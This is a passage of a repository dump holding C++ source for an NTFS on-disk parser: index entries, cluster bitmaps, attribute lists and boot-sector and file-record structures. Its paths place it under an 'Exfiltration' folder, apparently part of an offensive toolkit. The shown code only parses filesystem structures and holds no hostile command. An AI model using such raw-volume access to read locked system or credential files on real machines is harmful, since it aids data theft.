size)\n\t{\n\t\t// Free previous data if any\n\t\tif (GetCount() > 0)\n\t\t\tRemoveAll();\n\t\tif (IndexBlock)\n\t\t\tdelete IndexBlock;\n\n\t\tIndexBlock = (INDEX_BLOCK*)new BYTE[size];\n\n\t\treturn IndexBlock;\n\t}\n};\t// CIndexBlock\n\n\n/////////////////////////////////////\n// Attribute: Index Root (Resident)\n/////////////////////////////////////\nclass CAttr_IndexRoot : public CAttrResident, public CIndexEntryList\n{\npublic:\n\tCAttr_IndexRoot(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttr_IndexRoot();\n\nprivate:\n\tconst ATTR_INDEX_ROOT *IndexRoot;\n\n\tvoid ParseIndexEntries();\n\npublic:\n\t__inline BOOL IsFileName() const;\n};\t// CAttr_IndexRoot\n\nCAttr_IndexRoot::CAttr_IndexRoot(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr): CAttrResident(ahc, fr)\n{\n\tNTFS_TRACE(\"Attribute: Index Root\\n\");\n\n\tIndexRoot = (ATTR_INDEX_ROOT*)AttrBody;\n\n\tif (IsFileName())\n\t{\n\t\tParseIndexEntries();\n\t}\n\telse\n\t{\n\t\tNTFS_TRACE(\"Index View not supported\\n\");\n\t}\n}\n\nCAttr_IndexRoot::~CAttr_IndexRoot()\n{\n\tNTFS_TRACE(\"CAttr_IndexRoot deleted\\n\");\n}\n\n// Get all the index entries\nvoid CAttr_IndexRoot::ParseIndexEntries()\n{\n\tINDEX_ENTRY *ie;\n\tie = (INDEX_ENTRY*)((BYTE*)(&(IndexRoot->EntryOffset)) + IndexRoot->EntryOffset);\n\n\tDWORD ieTotal = ie->Size;\n\n\twhile (ieTotal <= IndexRoot->TotalEntrySize)\n\t{\n\t\tCIndexEntry *ieClass = new CIndexEntry(ie);\n\t\tInsertEntry(ieClass);\n\n\t\tif (ie->Flags & INDEX_ENTRY_FLAG_LAST)\n\t\t{\n\t\t\tNTFS_TRACE(\"Last Index Entry\\n\");\n\t\t\tbreak;\n\t\t}\n\n\t\tie = (INDEX_ENTRY*)((BYTE*)ie + ie->Size);\t// Pick next\n\t\tieTotal += ie->Size;\n\t}\n}\n\n// Check if this IndexRoot contains FileName or IndexView\n__inline BOOL CAttr_IndexRoot::IsFileName() const\n{\n\treturn (IndexRoot->AttrType == ATTR_TYPE_FILE_NAME);\n}\n\n\n/////////////////////////////////////////////\n// Attribute: Index Allocation (NonResident)\n/////////////////////////////////////////////\nclass CAttr_IndexAlloc : public CAttrNonResident\n{\npublic:\n\tCAttr_IndexAlloc(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttr_IndexAlloc();\n\nprivate:\n\tULONGLONG IndexBlockCount;\n\n\tBOOL PatchUS(WORD *sector, int sectors, WORD usn, WORD *usarray);\n\npublic:\n\t__inline ULONGLONG GetIndexBlockCount();\n\tBOOL ParseIndexBlock(const ULONGLONG &vcn, CIndexBlock &ibClass);\n};\t// CAttr_IndexAlloc\n\nCAttr_IndexAlloc::CAttr_IndexAlloc(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : CAttrNonResident(ahc, fr)\n{\n\tNTFS_TRACE(\"Attribute: Index Allocation\\n\");\n\n\tIndexBlockCount = 0;\n\n\tif (IsDataRunOK())\n\t{\n\t\t// Get total number of Index Blocks\n\t\tULONGLONG ibTotalSize;\n\t\tibTotalSize = GetDataSize();\n\t\tif (ibTotalSize % _IndexBlockSize)\n\t\t{\n\t\t\tNTFS_TRACE2(\"Cannot calulate number of IndexBlocks, total size = %I64u, unit = %u\\n\",\n\t\t\t\t\tibTotalSize, _IndexBlockSize);\n\t\t\treturn;\n\t\t}\n\t\tIndexBlockCount = ibTotalSize / _IndexBlockSize;\n\t}\n\telse\n\t{\n\t\tNTFS_TRACE(\"Index Allocation DataRun parse error\\n\");\n\t}\n}\n\nCAttr_IndexAlloc::~CAttr_IndexAlloc()\n{\n\tNTFS_TRACE(\"CAttr_IndexAlloc deleted\\n\");\n}\n\n// Verify US and update sectors\nBOOL CAttr_IndexAlloc::PatchUS(WORD *sector, int sectors, WORD usn, WORD *usarray)\n{\n\tint i;\n\n\tfor (i=0; i<sectors; i++)\n\t{\n\t\tsector += ((_SectorSize>>1) - 1);\n\t\tif (*sector != usn)\n\t\t\treturn FALSE;\t\t// USN error\n\t\t*sector = usarray[i];\t// Write back correct data\n\t\tsector++;\n\t}\n\treturn TRUE;\n}\n\n__inline ULONGLONG CAttr_IndexAlloc::GetIndexBlockCount()\n{\n\treturn IndexBlockCount;\n}\n\n// Parse a single Index Block\n// vcn = Index Block VCN in Index Allocation Data Attributes\n// ibClass holds the parsed Index Entries\nBOOL CAttr_IndexAlloc::ParseIndexBlock(const ULONGLONG &vcn, CIndexBlock &ibClass)\n{\n\tif (vcn >= IndexBlockCount)\t// Bounds check\n\t\treturn FALSE;\n\n\t// Allocate buffer for a single Index Block\n\tINDEX_BLOCK *ibBuf = ibClass.AllocIndexBlock(_IndexBlockSize);\n\n\t// Sectors Per Index Block\n\tDWORD sectors = _IndexBlockSize / _SectorSize;\n\n\t// Read one Index Block\n\tDWORD len;\n\tif (ReadData(vcn*_IndexBlockSize, ibBuf, _IndexBlockSize, &len) &&\n\t\tlen == _IndexBlockSize)\n\t{\n\t\tif (ibBuf->Magic != INDEX_BLOCK_MAGIC)\n\t\t{\n\t\t\tNTFS_TRACE(\"Index Block parse error: Magic mismatch\\n\");\n\t\t\treturn FALSE;\n\t\t}\n\n\t\t// Patch US\n\t\tWORD *usnaddr = (WORD*)((BYTE*)ibBuf + ibBuf->OffsetOfUS);\n\t\tWORD usn = *usnaddr;\n\t\tWORD *usarray = usnaddr + 1;\n\t\tif (!PatchUS((WORD*)ibBuf, sectors, usn, usarray))\n\t\t{\n\t\t\tNTFS_TRACE(\"Index Block parse error: Update Sequence Number\\n\");\n\t\t\treturn FALSE;\n\t\t}\n\n\t\tINDEX_ENTRY *ie;\n\t\tie = (INDEX_ENTRY*)((BYTE*)(&(ibBuf->EntryOffset)) + ibBuf->EntryOffset);\n\n\t\tDWORD ieTotal = ie->Size;\n\n\t\twhile (ieTotal <= ibBuf->TotalEntrySize)\n\t\t{\n\t\t\tCIndexEntry *ieClass = new CIndexEntry(ie);\n\t\t\tibClass.InsertEntry(ieClass);\n\n\t\t\tif (ie->Flags & INDEX_ENTRY_FLAG_LAST)\n\t\t\t{\n\t\t\t\tNTFS_TRACE(\"Last Index Entry\\n\");\n\t\t\t\tbreak;\n\t\t\t}\n\n\t\t\tie = (INDEX_ENTRY*)((BYTE*)ie + ie->Size);\t// Pick next\n\t\t\tieTotal += ie->Size;\n\t\t}\n\n\t\treturn TRUE;\n\t}\n\telse\n\t\treturn FALSE;\n}\n\n\n////////////////////////////////////////////\n// Attribute: Bitmap\n////////////////////////////////////////////\ntemplate <class TYPE_RESIDENT>\nclass CAttr_Bitmap : public TYPE_RESIDENT\n{\npublic:\n\tCAttr_Bitmap(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttr_Bitmap();\n\nprivate:\n\tULONGLONG BitmapSize;\t// Bitmap data size\n\tBYTE *BitmapBuf;\t\t// Bitmap data buffer\n\tLONGLONG CurrentCluster;\n\npublic:\n\tBOOL IsClusterFree(const ULONGLONG &cluster) const;\n};\t// CAttr_Bitmap\n\ntemplate <class TYPE_RESIDENT>\nCAttr_Bitmap<TYPE_RESIDENT>::CAttr_Bitmap(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : TYPE_RESIDENT(ahc, fr)\n{\n\tNTFS_TRACE1(\"Attribute: Bitmap (%sResident)\\n\", IsNonResident() ? \"Non\" : \"\");\n\n\tCurrentCluster = -1;\n\n\tif (IsDataRunOK())\n\t{\n\t\tBitmapSize = GetDataSize();\n\n\t\tif (IsNonResident())\n\t\t\tBitmapBuf = new BYTE[_ClusterSize];\n\t\telse\n\t\t{\n\t\t\tBitmapBuf = new BYTE[(DWORD)BitmapSize];\n\n\t\t\tDWORD len;\n\t\t\tif (!(ReadData(0, BitmapBuf, (DWORD)BitmapSize, &len)\n\t\t\t\t&& len == (DWORD)BitmapSize))\n\t\t\t{\n\t\t\t\tBitmapBuf = NULL;\n\t\t\t\tNTFS_TRACE(\"Read Resident Bitmap data failed\\n\");\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tNTFS_TRACE1(\"%u bytes of resident Bitmap data read\\n\", len);\n\t\t\t}\n\t\t}\n\t}\n\telse\n\t{\n\t\tBitmapSize = 0;\n\t\tBitmapBuf = 0;\n\t}\n}\n\ntemplate <class TYPE_RESIDENT>\nCAttr_Bitmap<TYPE_RESIDENT>::~CAttr_Bitmap()\n{\n\tif (BitmapBuf)\n\t\tdelete BitmapBuf;\n\n\tNTFS_TRACE(\"CAttr_Bitmap deleted\\n\");\n}\n\n// Verify if a single cluster is free\ntemplate <class TYPE_RESIDENT>\nBOOL CAttr_Bitmap<TYPE_RESIDENT>::IsClusterFree(const ULONGLONG &cluster) const\n{\n\tif (!IsDataRunOK() || !BitmapBuf)\n\t\treturn FALSE;\n\n\tif (IsNonResident())\n\t{\n\t\tLONGLONG idx = (LONGLONG)cluster >> 3;\n\t\tDWORD clusterSize = ((CNTFSVolume*)Volume)->GetClusterSize();\n\n\t\tLONGLONG clusterOffset = idx/clusterSize;\n\t\tcluster -= (clusterOffset*clusterSize*8);\n\n\t\t// Read one cluster of data if buffer mismatch\n\t\tif (CurrentCluster != clusterOffset)\n\t\t{\n\t\t\tDWORD len;\n\t\t\tif (ReadData(clusterOffset, BitmapBuf, clusterSize, &len) && len == clusterSize)\n\t\t\t{\n\t\t\t\tCurrentCluster = clusterOffset;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tCurrentCluster = -1;\n\t\t\t\treturn FALSE;\n\t\t\t}\n\t\t}\n\t}\n\n\t// All the Bitmap data is already in BitmapBuf\n\tDWORD idx = (DWORD)(cluster >> 3);\n\tif (IsNonResident() == FALSE)\n\t{\n\t\tif (idx >= BitmapSize)\n\t\t\treturn TRUE;\t// Resident data bounds check error\n\t}\n\n\tBYTE fac = (BYTE)(cluster % 8);\n\n\treturn ((BitmapBuf[idx] & (1<<fac)) == 0);\n}\n\n\n////////////////////////////////////////////\n// List to hold external File Records\n////////////////////////////////////////////\ntypedef CSList<CFileRecord> CFileRecordList;\n\n////////////////////////////////////////////\n// Attribute: Attribute List\n////////////////////////////////////////////\ntemplate <class TYPE_RESIDENT>\nclass CAttr_AttrList : public TYPE_RESIDENT\n{\npublic:\n\tCAttr_AttrList(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttr_AttrList();\n\nprivate:\n\tCFileRecordList FileRecordList;\n};\t// CAttr_AttrList\n\ntemplate <class TYPE_RESIDENT>\nCAttr_AttrList<TYPE_RESIDENT>::CAttr_AttrList(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : TYPE_RESIDENT(ahc, fr)\n{\n\tNTFS_TRACE(\"Attribute: Attribute List\\n\");\n\tif (fr->FileReference == (ULONGLONG)-1)\n\t\treturn;\n\n\tULONGLONG offset = 0;\n\tDWORD len;\n\tATTR_ATTRIBUTE_LIST alRecord;\n\n\twhile (ReadData(offset, &alRecord, sizeof(ATTR_ATTRIBUTE_LIST), &len) &&\n\t\tlen == sizeof(ATTR_ATTRIBUTE_LIST))\n\t{\n\t\tif (ATTR_INDEX(alRecord.AttrType) > ATTR_NUMS)\n\t\t{\n\t\t\tNTFS_TRACE(\"Attribute List parse error1\\n\");\n\t\t\tbreak;\n\t\t}\n\n\t\tNTFS_TRACE1(\"Attribute List: 0x%04x\\n\", alRecord.AttrType);\n\n\t\tULONGLONG recordRef = alRecord.BaseRef & 0x0000FFFFFFFFFFFFUL;\n\t\tif (recordRef != fr->FileReference)\t// Skip contained attributes\n\t\t{\n\t\t\tDWORD am = ATTR_MASK(alRecord.AttrType);\n\t\t\tif (am & fr->AttrMask)\t// Skip unwanted attributes\n\t\t\t{\n\t\t\t\tCFileRecord *frnew = new CFileRecord(fr->Volume);\n\t\t\t\tFileRecordList.InsertEntry(frnew);\n\n\t\t\t\tfrnew->AttrMask = am;\n\t\t\t\tif (!frnew->ParseFileRecord(recordRef))\n\t\t\t\t{\n\t\t\t\t\tNTFS_TRACE(\"Attribute List parse error2\\n\");\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tfrnew->ParseAttrs();\n\n\t\t\t\t// Insert new found AttrList to fr->AttrList\n\t\t\t\tconst CAttrBase *ab = (CAttrBase*)frnew->FindFirstAttr(alRecord.AttrType);\n\t\t\t\twhile (ab)\n\t\t\t\t{\n\t\t\t\t\tCAttrList *al = (CAttrList*)&fr->AttrList[ATTR_INDEX(alRecord.AttrType)];\n\t\t\t\t\tal->InsertEntry((CAttrBase*)ab);\n\t\t\t\t\tab = frnew->FindNextAttr(alRecord.AttrType);\n\t\t\t\t}\n\n\t\t\t\t// Throw away frnew->AttrList entries to prevent free twice (fr will delete them)\n\t\t\t\tfrnew->AttrList[ATTR_INDEX(alRecord.AttrType)].ThrowAll();\n\t\t\t}\n\t\t}\n\n\t\toffset += alRecord.RecordSize;\n\t}\n}\n\ntemplate <class TYPE_RESIDENT>\nCAttr_AttrList<TYPE_RESIDENT>::~CAttr_AttrList()\n{\n\tNTFS_TRACE(\"CAttr_AttrList deleted\\n\");\n}\n\n#endif\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParser/NTFS_Common.h",
    "content": "/*\n * NTFS Class common definitions\n * \n * Copyright(C) 2010 cyb70289 <cyb70289@gmail.com>\n *\n * This program/include file is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License as published\n * by the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program/include file is distributed in the hope that it will be\n * useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n */\n\n#ifndef\t__NTFS_COMMON_H_CYB70289\n#define\t__NTFS_COMMON_H_CYB70289\n\n#include <windows.h>\n#include <stdio.h>\n#include <tchar.h>\n#include <crtdbg.h>\n\n#include \"NTFS_DataType.h\"\n\n#define\tATTR_NUMS\t\t16\t\t\t\t// Attribute Types count\n#define\tATTR_INDEX(at)\t(((at)>>4)-1)\t// Attribute Type to Index, eg. 0x10->0, 0x30->2\n#define\tATTR_MASK(at)\t(((DWORD)1)<<ATTR_INDEX(at))\t// Attribute Bit Mask\n\n// Bit masks of Attributes\n#define\tMASK_STANDARD_INFORMATION\tATTR_MASK(ATTR_TYPE_STANDARD_INFORMATION)\n#define\tMASK_ATTRIBUTE_LIST\t\t\tATTR_MASK(ATTR_TYPE_ATTRIBUTE_LIST)\n#define\tMASK_FILE_NAME\t\t\t\tATTR_MASK(ATTR_TYPE_FILE_NAME)\n#define\tMASK_OBJECT_ID\t\t\t\tATTR_MASK(ATTR_TYPE_OBJECT_ID)\n#define\tMASK_SECURITY_DESCRIPTOR\tATTR_MASK(ATTR_TYPE_SECURITY_DESCRIPTOR)\n#define\tMASK_VOLUME_NAME\t\t\tATTR_MASK(ATTR_TYPE_VOLUME_NAME)\n#define\tMASK_VOLUME_INFORMATION\t\tATTR_MASK(ATTR_TYPE_VOLUME_INFORMATION)\n#define\tMASK_DATA\t\t\t\t\tATTR_MASK(ATTR_TYPE_DATA)\n#define\tMASK_INDEX_ROOT\t\t\t\tATTR_MASK(ATTR_TYPE_INDEX_ROOT)\n#define\tMASK_INDEX_ALLOCATION\t\tATTR_MASK(ATTR_TYPE_INDEX_ALLOCATION)\n#define\tMASK_BITMAP\t\t\t\t\tATTR_MASK(ATTR_TYPE_BITMAP)\n#define\tMASK_REPARSE_POINT\t\t\tATTR_MASK(ATTR_TYPE_REPARSE_POINT)\n#define\tMASK_EA_INFORMATION\t\t\tATTR_MASK(ATTR_TYPE_EA_INFORMATION)\n#define\tMASK_EA\t\t\t\t\t\tATTR_MASK(ATTR_TYPE_EA)\n#define\tMASK_LOGGED_UTILITY_STREAM\tATTR_MASK(ATTR_TYPE_LOGGED_UTILITY_STREAM)\n\n#define\tMASK_ALL\t\t\t\t\t((DWORD)-1)\n\n#define\tNTFS_TRACE(t1)\t\t\t\t\t_RPT0(_CRT_WARN, t1)\n#define\tNTFS_TRACE1(t1, t2)\t\t\t\t_RPT1(_CRT_WARN, t1, t2)\n#define\tNTFS_TRACE2(t1, t2, t3)\t\t\t_RPT2(_CRT_WARN, t1, t2, t3)\n#define\tNTFS_TRACE3(t1, t2, t3, t4)\t\t_RPT3(_CRT_WARN, t1, t2, t3, t4)\n#define\tNTFS_TRACE4(t1, t2, t3, t4, t5)\t_RPT4(_CRT_WARN, t1, t2, t3, t4, t5)\n\n// User defined Callback routines to process raw attribute data\n// Set bDiscard to TRUE if this Attribute is to be discarded\n// Set bDiscard to FALSE to let CFileRecord process it\ntypedef void (*ATTR_RAW_CALLBACK)(const ATTR_HEADER_COMMON *attrHead, BOOL *bDiscard);\n\n// User defined Callback routine to handle CFileRecord parsed attributes\n// Will be called by CFileRecord::TraverseAttrs() for each attribute\n// attrClass is the according attribute's wrapping class, CAttr_xxx\n// Set bStop to TRUE if don't want to continue\n// Set bStop to FALSE to continue processing\nclass CAttrBase;\ntypedef void (*ATTRS_CALLBACK)(const CAttrBase *attr, void *context, BOOL *bStop);\n\n// User defined Callback routine to handle Directory traversing\n// Will be called by CFileRecord::TraverseSubEntries for each sub entry\nclass CIndexEntry;\ntypedef void (*SUBENTRY_CALLBACK)(const CIndexEntry *ie);\n\n\n// List Entry\ntemplate <class ENTRY_TYPE>\nstruct NTSLIST_ENTRY\n{\n\tNTSLIST_ENTRY\t*Next;\n\tENTRY_TYPE\t\t*Entry;\n};\n\n// List Entry Smart Pointer\ntemplate <class ENTRY_TYPE>\nclass CEntrySmartPtr\n{\npublic:\n\tCEntrySmartPtr(ENTRY_TYPE *ptr = NULL)\n\t{\n\t\tEntryPtr = ptr;\n\t}\n\n\tvirtual ~CEntrySmartPtr()\n\t{\n\t\tif (EntryPtr)\n\t\t\tdelete EntryPtr;\n\t}\n\nprivate:\n\tconst ENTRY_TYPE *EntryPtr;\n\npublic:\n\t__inline CEntrySmartPtr<ENTRY_TYPE> operator = (const ENTRY_TYPE* ptr)\n\t{\n\t\t// Delete previous pointer if allocated\n\t\tif (EntryPtr)\n\t\t\tdelete EntryPtr;\n\n\t\tEntryPtr = ptr;\n\n\t\treturn *this;\n\t}\n\n\t__inline const ENTRY_TYPE* operator->() const\n\t{\n\t\t_ASSERT(EntryPtr);\n\t\treturn EntryPtr;\n\t}\n\n\t__inline BOOL IsValid() const\n\t{\n\t\treturn EntryPtr != NULL;\n\t}\n};\n\n//////////////////////////////////////\n// Single list implementation\n//////////////////////////////////////\ntemplate <class ENTRY_TYPE>\nclass CSList\n{\npublic:\n\tCSList()\n\t{\n\t\tListHead = ListTail = NULL;\n\t\tListCurrent = NULL;\n\t\tEntryCount = 0;\n\t}\n\n\tvirtual ~CSList()\n\t{\n\t\tRemoveAll();\n\t}\n\nprivate:\n\tint EntryCount;\n\tNTSLIST_ENTRY<ENTRY_TYPE> *ListHead;\n\tNTSLIST_ENTRY<ENTRY_TYPE> *ListTail;\n\tNTSLIST_ENTRY<ENTRY_TYPE> *ListCurrent;\n\npublic:\n\t// Get entry count\n\t__inline int GetCount() const\n\t{\n\t\treturn EntryCount;\n\t}\n\n\t// Insert to tail\n\tBOOL InsertEntry(ENTRY_TYPE *entry)\n\t{\n\t\tNTSLIST_ENTRY<ENTRY_TYPE> *le = new NTSLIST_ENTRY<ENTRY_TYPE>;\n\t\tif (!le)\n\t\t\treturn FALSE;\n\n\t\tle->Entry = entry;\n\t\tle->Next = NULL;\n\n\t\tif (ListTail == NULL)\n\t\t\tListHead = le;\t\t// Empty list\n\t\telse\n\t\t\tListTail->Next = le;\n\n\t\tListTail = le;\n\n\t\tEntryCount++;\n\t\treturn TRUE;\n\t}\n\n\t// Remove all entries\n\tvoid RemoveAll()\n\t{\n\t\twhile (ListHead)\n\t\t{\n\t\t\tListCurrent = ListHead->Next;\n\t\t\tdelete ListHead->Entry;\n\t\t\tdelete ListHead;\n\n\t\t\tListHead = ListCurrent;\n\t\t}\n\n\t\tListHead = ListTail = NULL;\n\t\tListCurrent = NULL;\n\t\tEntryCount = 0;\n\t}\n\n\t// Find first entry\n\t__inline ENTRY_TYPE *FindFirstEntry() const\n\t{\n\t\t((CSList<ENTRY_TYPE>*)this)->ListCurrent = ListHead;\n\n\t\tif (ListCurrent)\n\t\t\treturn ListCurrent->Entry;\n\t\telse\n\t\t\treturn NULL;\n\t}\n\n\t// Find next entry\n\t__inline ENTRY_TYPE *FindNextEntry() const\n\t{\n\t\tif (ListCurrent)\n\t\t\t((CSList<ENTRY_TYPE>*)this)->ListCurrent = ListCurrent->Next;\n\n\t\tif (ListCurrent)\n\t\t\treturn ListCurrent->Entry;\n\t\telse\n\t\t\treturn NULL;\n\t}\n\n\t// Throw all entries\n\t// Caution! All entries are just thrown without free\n\t__inline void ThrowAll()\n\t{\n\t\tListHead = ListTail = NULL;\n\t\tListCurrent = NULL;\n\t\tEntryCount = 0;\n\t}\n};\t//CSList\n\n\n//////////////////////////////////////\n// Stack implementation\n//////////////////////////////////////\ntemplate <class ENTRY_TYPE>\nclass CStack\n{\npublic:\n\tCStack()\n\t{\n\t\tListHead = ListTail = NULL;\n\t\tEntryCount = 0;\n\t}\n\n\tvirtual ~CStack()\n\t{\n\t\tRemoveAll();\n\t}\n\nprivate:\n\tint EntryCount;\n\tNTSLIST_ENTRY<ENTRY_TYPE> *ListHead;\n\tNTSLIST_ENTRY<ENTRY_TYPE> *ListTail;\n\npublic:\n\t// Get entry count\n\t__inline int GetCount() const\n\t{\n\t\treturn EntryCount;\n\t}\n\n\t// Insert to head\n\tBOOL Push(ENTRY_TYPE *entry)\n\t{\n\t\tNTSLIST_ENTRY<ENTRY_TYPE> *le = new NTSLIST_ENTRY<ENTRY_TYPE>;\n\t\tif (!le)\n\t\t\treturn FALSE;\n\n\t\tle->Entry = entry;\n\t\tle->Next = ListHead;\n\n\t\tListHead = le;\n\n\t\tif (ListTail == NULL)\n\t\t\tListTail = le;\t\t// Empty list\n\n\t\tEntryCount ++;\n\t\treturn TRUE;\n\t}\n\n\t// Remove from head\n\tENTRY_TYPE* Pop()\n\t{\n\t\tif (ListHead == NULL)\n\t\t\treturn NULL;\n\n\t\tNTSLIST_ENTRY<ENTRY_TYPE> *le = ListHead;\n\t\tENTRY_TYPE *e = le->Entry;\n\n\t\tif (ListTail == ListHead)\n\t\t\tListTail = ListHead->Next;\n\t\tListHead = ListHead->Next;\n\n\t\tdelete le;\n\t\tEntryCount --;\n\n\t\treturn e;\n\t}\n\n\t// Remove all entries\n\tvoid RemoveAll()\n\t{\n\t\tNTSLIST_ENTRY<ENTRY_TYPE> *le;\n\n\t\twhile (ListHead)\n\t\t{\n\t\t\tle = ListHead->Next;\n\t\t\tdelete ListHead->Entry;\n\t\t\tdelete ListHead;\n\n\t\t\tListHead = le;\n\t\t}\n\n\t\tListHead = ListTail = NULL;\n\t\tEntryCount = 0;\n\t}\n};\t//CStack\n\n#endif\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParser/NTFS_DataType.h",
    "content": "/*\n * NTFS data structures and definitions\n * \n * Copyright(C) 2010 cyb70289 <cyb70289@gmail.com>\n *\n * This program/include file is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License as published\n * by the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program/include file is distributed in the hope that it will be\n * useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n */\n\n#ifndef\t__NTFS_DATATYPE_H_CYB70289\n#define\t__NTFS_DATATYPE_H_CYB70289\n\n// NTFS Boot Sector BPB\n\n#define\tNTFS_SIGNATURE\t\t\"NTFS    \"\n\n#pragma pack(1)\ntypedef struct tagNTFS_BPB\n{\n\t// jump instruction\n\tBYTE\t\tJmp[3];\n\n\t// signature\n\tBYTE\t\tSignature[8];\n\n\t// BPB and extended BPB\n\tWORD\t\tBytesPerSector;\n\tBYTE\t\tSectorsPerCluster;\n\tWORD\t\tReservedSectors;\n\tBYTE\t\tZeros1[3];\n\tWORD\t\tNotUsed1;\n\tBYTE\t\tMediaDescriptor;\n\tWORD\t\tZeros2;\n\tWORD\t\tSectorsPerTrack;\n\tWORD\t\tNumberOfHeads;\n\tDWORD\t\tHiddenSectors;\n\tDWORD\t\tNotUsed2;\n\tDWORD\t\tNotUsed3;\n\tULONGLONG\tTotalSectors;\n\tULONGLONG\tLCN_MFT;\n\tULONGLONG\tLCN_MFTMirr;\n\tDWORD\t\tClustersPerFileRecord;\n\tDWORD\t\tClustersPerIndexBlock;\n\tBYTE\t\tVolumeSN[8];\n\n\t// boot code\n\tBYTE\t\tCode[430];\n\n\t//0xAA55\n\tBYTE\t\t_AA;\n\tBYTE\t\t_55;\n} NTFS_BPB;\n#pragma pack()\n\n\n// MFT Indexes\n#define\tMFT_IDX_MFT\t\t\t\t0\n#define\tMFT_IDX_MFT_MIRR\t\t1\n#define\tMFT_IDX_LOG_FILE\t\t2\n#define\tMFT_IDX_VOLUME\t\t\t3\n#define\tMFT_IDX_ATTR_DEF\t\t4\n#define\tMFT_IDX_ROOT\t\t\t5\n#define\tMFT_IDX_BITMAP\t\t\t6\n#define\tMFT_IDX_BOOT\t\t\t7\n#define\tMFT_IDX_BAD_CLUSTER\t\t8\n#define\tMFT_IDX_SECURE\t\t\t9\n#define\tMFT_IDX_UPCASE\t\t\t10\n#define\tMFT_IDX_EXTEND\t\t\t11\n#define\tMFT_IDX_RESERVED12\t\t12\n#define\tMFT_IDX_RESERVED13\t\t13\n#define\tMFT_IDX_RESERVED14\t\t14\n#define\tMFT_IDX_RESERVED15\t\t15\n#define\tMFT_IDX_USER\t\t\t16\n\n\n/******************************\n\t\tFile Record\n\t---------------------\n\t| File Record Header|\n\t---------------------\n\t|    Attribute 1    |\n\t---------------------\n\t|    Attribute 2    |\n\t---------------------\n\t|      ......       |\n\t---------------------\n\t|     0xFFFFFFFF    |\n\t---------------------\n*******************************/\n\n// File Record Header\n\n#define\tFILE_RECORD_MAGIC\t\t'ELIF'\n#define\tFILE_RECORD_FLAG_INUSE\t0x01\t// File record is in use\n#define\tFILE_RECORD_FLAG_DIR\t0x02\t// File record is a directory\n\ntypedef struct tagFILE_RECORD_HEADER\n{\n\tDWORD\t\tMagic;\t\t\t// \"FILE\"\n\tWORD\t\tOffsetOfUS;\t\t// Offset of Update Sequence\n\tWORD\t\tSizeOfUS;\t\t// Size in words of Update Sequence Number & Array\n\tULONGLONG\tLSN;\t\t\t// $LogFile Sequence Number\n\tWORD\t\tSeqNo;\t\t\t// Sequence number\n\tWORD\t\tHardlinks;\t\t// Hard link count\n\tWORD\t\tOffsetOfAttr;\t// Offset of the first Attribute\n\tWORD\t\tFlags;\t\t\t// Flags\n\tDWORD\t\tRealSize;\t\t// Real size of the FILE record\n\tDWORD\t\tAllocSize;\t\t// Allocated size of the FILE record\n\tULONGLONG\tRefToBase;\t\t// File reference to the base FILE record\n\tWORD\t\tNextAttrId;\t\t// Next Attribute Id\n\tWORD\t\tAlign;\t\t\t// Align to 4 byte boundary\n\tDWORD\t\tRecordNo;\t\t// Number of this MFT Record\n} FILE_RECORD_HEADER;\n\n\n/******************************\n\t\tAttribute\n\t--------------------\n\t| Attribute Header |\n\t--------------------\n\t|  Attribute Data  |\n\t--------------------\n*******************************/\n\n// Attribute Header\n\n#define\tATTR_TYPE_STANDARD_INFORMATION\t0x10\n#define\tATTR_TYPE_ATTRIBUTE_LIST\t\t0x20\n#define\tATTR_TYPE_FILE_NAME\t\t\t\t0x30\n#define\tATTR_TYPE_OBJECT_ID\t\t\t\t0x40\n#define\tATTR_TYPE_SECURITY_DESCRIPTOR\t0x50\n#define\tATTR_TYPE_VOLUME_NAME\t\t\t0x60\n#define\tATTR_TYPE_VOLUME_INFORMATION\t0x70\n#define\tATTR_TYPE_DATA\t\t\t\t\t0x80\n#define\tATTR_TYPE_INDEX_ROOT\t\t\t0x90\n#define\tATTR_TYPE_INDEX_ALLOCATION\t\t0xA0\n#define\tATTR_TYPE_BITMAP\t\t\t\t0xB0\n#define\tATTR_TYPE_REPARSE_POINT\t\t\t0xC0\n#define\tATTR_TYPE_EA_INFORMATION\t\t0xD0\n#define\tATTR_TYPE_EA\t\t\t\t\t0xE0\n#define\tATTR_TYPE_LOGGED_UTILITY_STREAM\t0x100\n\n#define\tATTR_FLAG_COMPRESSED\t\t\t0x0001\n#define\tATTR_FLAG_ENCRYPTED\t\t\t\t0x4000\n#define\tATTR_FLAG_SPARSE\t\t\t\t0x8000\n\ntypedef\tstruct tagATTR_HEADER_COMMON\n{\n\tDWORD\t\tType;\t\t\t// Attribute Type\n\tDWORD\t\tTotalSize;\t\t// Length (including this header)\n\tBYTE\t\tNonResident;\t// 0 - resident, 1 - non resident\n\tBYTE\t\tNameLength;\t\t// name length in words\n\tWORD\t\tNameOffset;\t\t// offset to the name\n\tWORD\t\tFlags;\t\t\t// Flags\n\tWORD\t\tId;\t\t\t\t// Attribute Id\n} ATTR_HEADER_COMMON;\n\ntypedef\tstruct tagATTR_HEADER_RESIDENT\n{\n\tATTR_HEADER_COMMON\tHeader;\t\t\t// Common data structure\n\tDWORD\t\t\t\tAttrSize;\t\t// Length of the attribute body\n\tWORD\t\t\t\tAttrOffset;\t\t// Offset to the 